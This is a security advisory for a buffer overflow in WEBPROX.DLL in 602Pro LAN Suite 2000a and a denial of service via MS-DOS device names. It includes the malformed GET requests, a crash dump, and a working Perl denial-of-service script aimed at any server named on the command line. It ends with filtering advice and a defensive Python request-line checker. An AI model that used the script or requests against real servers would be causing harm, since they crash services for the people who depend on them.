
602Pro LAN Suite WEBPROX.DLL Buffer Overflow



Vulnerability

    602Pro Lansuite

Affected

    602Pro Lansuite 2000a 1.0.34 - prior

Description

    'nitr0s' found the following. There are two problems: the first is a
    buffer overflow in WEBPROX.DLL and the other relates to MS-DOS device
    files. Credit should be given to Peter Grundl, who made nitr0s think
    of trying this same problem that he found in the Alt-N Technologies
    MDaemon WebConfiguration feature, which also affects Xitami Webserver
    2.4b5 and probably a whole load of other Windows server programs.

    Connect to the webserver and send the following request:

        GET /%2e%2e%2e%2e.... /HTTP/1.0

    where %2e is repeated more than 157 times.

    Depending on how many times %2e (or '.') is sent, the server will
    exit, displaying the following error:

        LANSUITE caused an invalid page fault in
        module WEBPROX.DLL at 015f:008a1326.
        Registers:
        EAX=0000000a CS=015f EIP=008a1326
        EFLGS=00010216
        EBX=00000008 SS=0167 ESP=05202848
        EBP=05202848
        ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
        EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
        Bytes at CS:EIP:
        8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18
        Stack dump:
        052029dc 00862e9a 0000000a 334f2b1f 000000fa
        81623ff0 81648e38 00000008 bff7b317 018d0000
        00000000 018d1650 018d1650 0520ace7 018d164c
        052028cc

    The other problem is requesting MS-DOS device files. Send the
    following request to the webserver on port 80:

        GET /aux

    The code:

    #!/usr/bin/perl
    #
    # 602Pro Lansuite 2000a 1.0.34 Denial Of Service
    #
    # Malformed GET request
    #
    use Getopt::Std;
    use Socket;

    getopts('s:', \%args);
    if(!defined($args{s})){&usage;}

    my ($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

    $foo = "%2e";                   # URL-encoded "."
    $number = "160";                # repeat count (crash reported above 157)
    $data .= $foo x $number;
    $serv = $args{s};
    $port = 80;
    $buf = "GET /$data /HTTP/1.0\r\n\r\n";   # the malformed request line shown above

    $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
    $paddr = sockaddr_in($port, $in_addr) || die("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");

    socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
    connect(S, $paddr) || die("Error: $!");
    select(S); $| = 1; select(STDOUT);   # unbuffer the socket handle
    print S "$buf";

    print("Data has been successfully sent to $serv\n");

    sub usage {die("\n\n$0 -s <server>\n\n");}

Solution

    Not sure what build nitr0s tried, but something similar was found in
    the past, so please take a look at:

        http://oliver.efri.hr/~crv/security/bugs/Others/602lswa.html

    As for the second problem, that one is OS-related. Filtering could
    help here anyway.
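    Filtering of the kind suggested above, as an added example (not code from the advisory, from nitr0s or from the vendor): a Python request-line check that percent-decodes the request-target, rejects abnormally long runs of dots and rejects any path segment naming an MS-DOS device file. The thresholds MAX_DOT_RUN and MAX_TARGET_LEN are constructed for this example, not values from the advisory.

```python
import re
from urllib.parse import unquote

# Windows reserved device names: a path segment naming one (with or
# without an extension, e.g. "aux" or "aux.txt") is resolved to the
# device rather than to a file, which is the second problem above.
DOS_DEVICES = {"con", "prn", "aux", "nul"} | {
    f"{base}{n}" for base in ("com", "lpt") for n in range(1, 10)
}

# Constructed limits for this example: the advisory reports a crash once
# more than 157 "%2e" sequences are sent, so any run of 32 or more dots
# and any decoded request-target longer than 1024 bytes is refused.
MAX_DOT_RUN = 32
MAX_TARGET_LEN = 1024


def is_dos_device(segment: str) -> bool:
    """True if a path segment would resolve to an MS-DOS device file."""
    name = segment.split(".", 1)[0].strip().lower()
    return name in DOS_DEVICES


def check_request_line(request_line: str):
    """Return (allowed, reason) for one HTTP request line.

    The target is percent-decoded before inspection so that "%2e" and
    "." are treated identically, as the vulnerable server does.
    """
    parts = request_line.strip().split()
    if len(parts) < 2:
        return False, "malformed request line"
    target = unquote(parts[1])
    if len(target) > MAX_TARGET_LEN:
        return False, f"request-target longer than {MAX_TARGET_LEN} bytes"
    longest_run = max((len(m) for m in re.findall(r"\.+", target)), default=0)
    if longest_run >= MAX_DOT_RUN:
        return False, f"run of {longest_run} dots in path"
    for segment in target.split("?", 1)[0].split("/"):
        if segment and is_dos_device(segment):
            return False, f"MS-DOS device name in path: {segment}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample request lines mirroring the two cases above.
    for line in ("GET /" + "%2e" * 160 + " /HTTP/1.0",
                 "GET /aux HTTP/1.0",
                 "GET /index.html HTTP/1.0"):
        print(check_request_line(line))
```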

